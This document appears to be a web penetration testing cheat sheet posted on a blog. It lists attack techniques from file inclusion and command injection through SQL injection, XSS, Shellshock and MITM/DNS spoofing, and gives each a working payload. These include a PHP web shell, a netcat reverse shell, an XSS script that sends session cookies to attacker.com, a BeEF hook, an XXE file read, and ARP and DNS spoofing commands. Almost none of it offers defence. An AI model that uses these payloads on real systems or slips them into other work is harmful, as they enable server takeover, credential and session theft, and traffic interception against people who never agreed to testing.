Web Penetration Testing Techniques and Exploits

File Inclusion and Upload Vulnerabilities

File inclusion vulnerabilities occur when a web application dynamically includes files based on user input without proper validation, allowing attackers to include malicious files. Modern server-side languages like PHP (since version 5.2.0) often disable remote file inclusion by default, making Local File Inclusion (LFI) more common than Remote File Inclusion (RFI).

A practical exploitation technique involves uploading a malicious file (e.g., a web shell) and then using an LFI vulnerability to execute it. For instance, on a server where uploads are stored in a known directory (e.g., ../../hackable/uploads/), an attacker can:

  1. Upload a PHP web shell disguised as a JPG file (e.g., webshell.jpg).
  2. Use an LFI vulnerability to execute a renaming script (rename.jpg) that changes the file extension back to .php.
  3. Execute the web shell via LFI to run arbitrary commands on the server.

Example web shell code (webshell.php):

<?php
    system($_GET['cmd']);
?>

OS Command Injection

Command injection vulnerabilities arise when user input is improperly sanitized and used in OS command execution. For example, a web application might use the shell_exec() function in PHP to run system commands based on user input.

Exploitation steps:

  1. Identify a vulnerable parameter (e.g., in a ping utility).
  2. Inject commands using separators like semicolons (e.g., 192.168.56.1; uname -a).
  3. Escalate to a reverse shell using tools like Netcat.

Example reverse shell command:

nc -e /bin/bash 192.168.56.1 12345

XML External Entity (XXE) Injection

XXE vulnerabilities occur when XML input is parsed without disabling external entity resolution, allowing attackers to read files or execute commands.

Exploitation example:

<?xml version="1.0"?>
<!DOCTYPE test [
    <!ENTITY fileEntity SYSTEM "file:///etc/passwd">
]>
<data>&fileEntity;</data>

This payload reads the /etc/passwd file. Attackers can also use XXE to perform Server-Side Request Forgery (SSRF) or execute commands if the expect:// wrapper is enabled.

Password Brute-Forcing with Hydra

Hydra is a network login cracker that supports brute-forcing various protocols. For web applications, it can automate login attempts by sending POST requests.

Example command to brute-force a login form:

hydra 192.168.56.102 http-form-post "/login.php:user=^USER^&pass=^PASS^:Invalid credentials" -L users.txt -P passwords.txt -t 2

This command tests username-password pairs from specified lists against the target login page.

Dictionary Attacks with Burp Suite Intruder

Burp Suite's Intruder tool can automate attacks on web parameters, such as login forms, by fuzzing with payloads.

Steps:

  1. Capture a login request with Burp Proxy.
  2. Send it to Intruder and define payload positions (e.g., username and password fields).
  3. Configure payload sets (e.g., wordlists for usernames and passwords).
  4. Launch the attack and analyze responses (e.g., different response lengths for successful logins).

Stealing Session Cookies via XSS

Cross-Site Scripting (XSS) can be leveraged to steal session cookies, enabling session hijacking.

Example malicious script:

<script>
    var req = new XMLHttpRequest();
    req.open('GET', 'http://attacker.com/steal?cookie=' + document.cookie, true);
    req.send();
</script>

When executed in a victim's browser, this sends their sesion cookie to an attacker-controlled server.

SQL Injection Exploitation

SQL injection allows attackers to execute arbitrary SQL queries. Steps for exploitation include:

  1. Determining the number of columns using ORDER BY.
  2. Extracting data via UNION queries.
  3. Retrieving database information (e.g., version, users, passwords).

Example union-based injection:

' UNION SELECT @@version, user() --

Automated SQL Injection with SQLMap

SQLMap automates SQL injection detection and exploitation.

Example command to extract database data:

sqlmap -u "http://target.com/page?id=1" --cookie="session=value" --data="param=value" --dbs

SQLMap can also dump table contents, execute commands, or provide an SQL shell.

Exploiting Tomcat with Metasploit

Apache Tomcat management interfaces may be vulnerable to brute-force attacks. Metasploit's tomcat_mgr_login module can automate this.

Example Metasploit usage:

use auxiliary/scanner/http/tomcat_mgr_login
set RHOSTS 192.168.56.102
set RPORT 8080
run

Successful exploitation can lead to uploading a web shell (e.g., a WAR file) for remote command eexcution.

Advanced Exploitation with BeEF

The Browser Exploitation Framework (BeEF) hooks browsers via XSS and enables client-side attacks.

Example hook script:

<script src="http://attacker:3000/hook.js"></script>

Once hooked, attackers can log keystrokes, steal cookies, or launch further exploits.

Blind SQL Injection

Blind SQL injection occurs when error messages are suppressed, but boolean-based or time-based techniques can still extract data.

Boolean-based example:

' AND (SELECT SUBSTRING(user(),1,1))='a' --

Time-based example:

' AND SLEEP(5) --

Shellshock Exploitation

Shellshock (CVE-2014-6271) is a Bash vulnerability allowing command injection via environment variables. It can be exploited in web applications using CGI scripts.

Example payload:

GET /cgi-bin/vulnerable.sh HTTP/1.1
User-Agent: () { :;}; echo; /bin/cat /etc/passwd

Password Hash Cracking

John the Ripper and Hashcat can crack password hashes obtained from databases.

John the Ripper example:

john --wordlist=rockyou.txt --format=raw-md5 hashes.txt

Hashcat (GPU-accelerated) example:

hashcat -m 0 -a 3 hashes.txt ?a?a?a?a?a?a?a?a

Cross-Site Request Forgery (CSRF)

CSRF tricks authenticated users into performing unintended actions. Attackers craft malicious requests that are executed when the user visits a page.

Example CSRF payload:

<img src="http://bank.com/transfer?to=attacker&amount=1000" />

Man-in-the-Middle (MITM) Attacks

MITM attacks intercept and modify communication between clients and servers. Tools like Ettercap and SSLsplit facilitate these attacks.

ARP spoofing with Ettercap:

ettercap -T -M arp /192.168.56.101// /192.168.56.102//

SSL stripping with SSLsplit:

sslsplit -D -l connections.log -k key.pem -c cert.pem ssl 0.0.0.0 8443 tcp 0.0.0.0 8080

DNS Spoofing

DNS spoofing redirects DNS queries to malicious IP addresses. Ettercap's dns_spoof plugin can automate this.

Example Ettercap command:

ettercap -i eth0 -T -P dns_spoof -M arp /192.168.56.101///

This redirects all DNS requests from the victim to the attacker's server.

Tags: Web Security Penetration Testing Exploitation Vulnerabilities SQL Injection

Posted on Sun, 10 May 2026 12:39:31 +0000 by dark dude

Hot Tags

©2026 Freaks City